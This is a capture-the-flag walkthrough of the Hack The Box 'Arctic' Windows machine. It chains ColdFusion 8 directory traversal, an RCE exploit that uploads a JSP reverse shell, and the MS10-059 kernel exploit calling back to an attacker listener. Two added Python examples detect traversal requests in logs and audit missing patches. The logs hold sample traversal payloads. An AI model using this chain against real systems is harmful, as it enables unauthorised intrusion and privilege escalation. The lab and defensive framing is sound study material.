Hack The Box — Arctic

Arctic is a medium rated Windows machine on Hack The Box and is also OSCP-like. We get the admin password using directory traversal on ColdFusion, then get a shell through an RCE exploit. Finally we escalate privileges using a kernel exploit.

ENUMERATION

Ports 135, 8500 and 49154 are open. Port 8500 seems to run fmtp (Flight Message Transfer Protocol). When we visit port 8500 in the browser, we find two directories, and within them many files, but nothing too useful.

We also find an admin login page, and it seems to run ColdFusion 8.

After searching for ColdFusion 8 on Google we find many exploits for remote code execution and file upload. One more exploit we find is this directory traversal exploit. If you read its first few lines, it clearly gives the URL path we need to visit to read some sensitive info.

Visit the URL accordingly and you will get the hashed password of the admin panel.
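From the defending side, the request pattern behind this step is easy to spot in web server logs. The following is an added example, not code from the writeup or from any of the exploits it links: it scans constructed access log lines, percent-decodes each request target repeatedly (so double-encoded and backslash variants are caught), and flags any request carrying a parent-directory sequence or a null byte. The log lines, paths and IPs are all constructed for the example.

```python
"""Flag HTTP requests whose target carries a directory traversal sequence.

Added example (not from the writeup). It scans constructed access log lines
in Common Log Format, normalises URL encoding (including double encoding
and encoded backslashes), and reports requests that try to walk up the
directory tree or smuggle a null byte into a file name.
"""
import re
from urllib.parse import unquote

# Constructed sample log lines (not real traffic from the machine).
SAMPLE_LOG = """\
10.10.14.2 - - [01/Jan/2021:10:00:00 +0000] "GET /index.cfm HTTP/1.1" 200 5120
10.10.14.2 - - [01/Jan/2021:10:00:05 +0000] "GET /app/view?page=../../../../some/secret.txt HTTP/1.1" 200 1024
10.10.14.2 - - [01/Jan/2021:10:00:09 +0000] "GET /app/view?page=%252e%252e%252f%252e%252e%252fsecret.txt HTTP/1.1" 200 800
10.10.14.2 - - [01/Jan/2021:10:00:12 +0000] "GET /images/logo.gif HTTP/1.1" 200 2048
10.10.14.2 - - [01/Jan/2021:10:00:15 +0000] "GET /scripts/..%5c..%5cconfig.ini HTTP/1.1" 404 300
10.10.14.2 - - [01/Jan/2021:10:00:20 +0000] "GET /app/view?page=report.txt%00.cfm HTTP/1.1" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+$'
)
TRAVERSAL_RE = re.compile(r"\.\./")


def normalise(target: str, rounds: int = 3) -> str:
    """Percent-decode until stable (catches double encoding), then turn
    backslashes into forward slashes so one regex covers both separators."""
    prev, cur = None, target
    for _ in range(rounds):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")


def classify(target: str) -> list:
    """Return the list of indicators found in one request target."""
    decoded = normalise(target)
    reasons = []
    if TRAVERSAL_RE.search(decoded):
        reasons.append("traversal")
    if "\x00" in decoded:
        reasons.append("null-byte")
    return reasons


def scan_log(text: str) -> list:
    """Return (ip, target, status, reasons) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        reasons = classify(m["target"])
        if reasons:
            hits.append((m["ip"], m["target"], int(m["status"]), reasons))
    return hits


if __name__ == "__main__":
    for ip, target, status, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(reasons)} {target}")
```

The status column matters when triaging: a traversal attempt answered with 200 is the one to investigate first, because the server handed back whatever file the path resolved to.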

However it is hashed and we need to crack it. For that I used CrackStation. Do note that we can also log in with the hashed password through Burp Suite by passing the hashed password in the password field (for more info about this, refer to Rana Khalil's Arctic writeup).

And the password is happyday, let's log in. From here I tried to look for a way to upload a reverse shell. For this application, we need to upload a .jsp shell. For uploading manually, there is an option called "Scheduled Tasks"; however I skipped the manual way as it seemed complex and looked for an exploit instead.

I found an RCE exploit (CVE-2009-2265).

You can also find a Python alternative on GitHub: https://github.com/zaphoxx/zaphoxx-coldfusion

The usage is also pretty simple.

We make a shell.jsp file using msfvenom and run the exploit.

Now all you have to do is start a netcat listener and visit /userfiles/file/3axq67.jsp, which will execute the JSP reverse shell file.

AND WE GOT A USER SHELL!!!

PRIVILEGE ESCALATION

We run the systeminfo command to find information about our target's build and architecture, which is x64.

We run whoami /priv to see our privileges, and I can already see that this machine is vulnerable to the Juicy Potato exploit. I won't use it here; you can refer to another writeup of mine where I have used it: https://sparshjazz.medium.com/tryhackme-retro-866de1e4242a

I will instead go with a kernel exploit. To do so, just save the output of the systeminfo command in a text file and on your Kali run the Windows Exploit Suggester tool.

We go with MS10-059; you can always try all the other kernel exploits as well to see if they work. If we Google it, we find a precompiled exploit for MS10-059 on GitHub: https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled
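What the exploit suggester does underneath is a hotfix comparison: it reads the build and the installed KB list out of systeminfo and checks which bulletins have no matching patch. The following is an added example, not the Windows Exploit Suggester code and not from the writeup, written as the same check a patch audit would run on a server. The systeminfo excerpt is constructed; the bulletin-to-KB table holds three rows filled in from memory (MS10-059 is KB982799, the Chimichurri bulletin) and a real audit would load that table from Microsoft's security update data instead.

```python
"""Report which kernel EoP bulletins a host is still missing, from systeminfo.

Added example (not from the writeup and not the Windows Exploit Suggester
source). It parses a constructed systeminfo dump, collects the installed
hotfixes, and lists the bulletins whose KB is absent.
"""
import re

# Constructed excerpt of `systeminfo` output (not the real Arctic host).
SAMPLE_SYSTEMINFO = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2592799
                           [02]: KB3143141
"""

# Bulletin -> KB table. Three illustrative rows from memory; a real audit
# should populate this from Microsoft's bulletin / security update data.
BULLETIN_KB = {
    "MS10-059": "KB982799",   # Tracing Feature for Services EoP (Chimichurri)
    "MS11-080": "KB2592799",  # afd.sys EoP
    "MS16-032": "KB3143141",  # Secondary Logon EoP
}

HOTFIX_RE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)
FIELD_RE = re.compile(r"^(?P<name>[^:]+):\s*(?P<value>.*)$")


def parse_systeminfo(text: str) -> dict:
    """Return the 'Field: value' pairs plus a 'hotfixes' set of KB numbers."""
    info = {"hotfixes": set()}
    for line in text.splitlines():
        kb = HOTFIX_RE.search(line)
        if kb:
            info["hotfixes"].add(kb.group(1).upper())
            continue
        m = FIELD_RE.match(line.strip())
        if m:
            info[m["name"].strip()] = m["value"].strip()
    return info


def os_build(info: dict):
    """Extract the numeric build from the 'OS Version' field, if present."""
    m = re.search(r"Build (\d+)", info.get("OS Version", ""))
    return int(m.group(1)) if m else None


def missing_bulletins(info: dict, table: dict = BULLETIN_KB) -> list:
    """Bulletins whose KB does not appear in the installed hotfix list."""
    return sorted(b for b, kb in table.items() if kb not in info["hotfixes"])


def report(text: str) -> list:
    """Human-readable audit lines for one systeminfo dump."""
    info = parse_systeminfo(text)
    lines = [f"{info.get('OS Name', '?')} build {os_build(info)} "
             f"({info.get('System Type', '?')})"]
    for bulletin in missing_bulletins(info):
        lines.append(f"MISSING {bulletin} ({BULLETIN_KB[bulletin]})")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE_SYSTEMINFO)))
```

On a host that is kept patched the missing list is empty; a non-empty list on a server that exposes a shell to untrusted users is exactly the condition this writeup goes on to exploit, so it is the thing to fix first.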

Do note that it can be risky to run precompiled exploits on your machine; however I am running it on my Kali machine in VMware, and the SecWiki GitHub repo is trusted and popular, so there are no worries.

Download the exploit and transfer it to the target using smbserver. Do note that in my case, no other way of transferring files to the target machine worked, such as certutil or PowerShell. Only smbserver worked.

On your Kali, start smbserver.py

and download the exploit on the Windows machine using the copy command.

On the GitHub repo of the exploit, I found a screenshot which showed the usage as: Chimichurri.exe <LHOST> <LPORT>, and we catch the connection using netcat (as shown below).

So finally let's run it !!!

And we get a shell as NT AUTHORITY\SYSTEM !!!

We are admin !

I hope you learned from this writeup. Make sure you follow me here on Medium for more such writeups of OSCP-like machines and articles. Until next time - ZEUS
